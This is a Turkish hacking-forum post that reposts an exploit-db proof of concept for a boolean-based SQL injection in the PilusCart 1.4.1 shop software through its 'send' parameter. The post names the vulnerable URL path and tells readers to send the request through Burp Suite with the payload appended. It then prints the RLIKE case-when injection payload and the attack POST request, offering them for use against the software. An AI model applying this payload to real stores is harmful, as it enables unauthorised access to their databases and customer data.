İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

PilusCart 1.4.1 - 'send' SQL Injection

19-02-2019 15:03
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: PilusCart 1.4.1 - 'send' SQL Vulnerability
# Dork: N/A
# CVE: N/A
# Date/Tarih: 10-02-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sitesi: https://sourceforge.net/projects/pilus/
# Software Link/Yazılımın Linki: https://sourceforge.net/projects/pilus/
# Version/Versiyon: 1.4.1
# Category/Kategori: Webapps
# Tested on/Test Edilen Sistem: Wamp64, @win
# Software description/Yazılım Açıklaması: PilusCart, PHP dilinde bugün en popüler web tabanlı çevrimiçi mağaza yönetim sistemidir. Verileri depolamak için PilusCart MySQL ilişkisel veritabanı yönetim sistemini kullanır.

Şuraya girin http://localhost/PiLUS/read-apa-itu-pdo
linkte verdiğim kırmızı alanları doldurun
https://i.hizliresim.com/MV11La.jpg
Burp suite ile kullanın. Sonra payload ı atak isteğinin sonuna ekleyin.



# POC - SQL (Boolean Based String)
# Parameters : send
# Attack Pattern : RLIKE (case when 7488715=7488715 then
0x656d69726f676c75 else 0x28 end)

# POST Request :
http://localhost/PiLUS/read-apa-itu-...174&send=Kirim


RLIKE
(case when 7488715=7488715 then 0x656d69726f676c75 else 0x28 end)


Exploit linki : https://www.exploit-db.com/exploits/46368
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı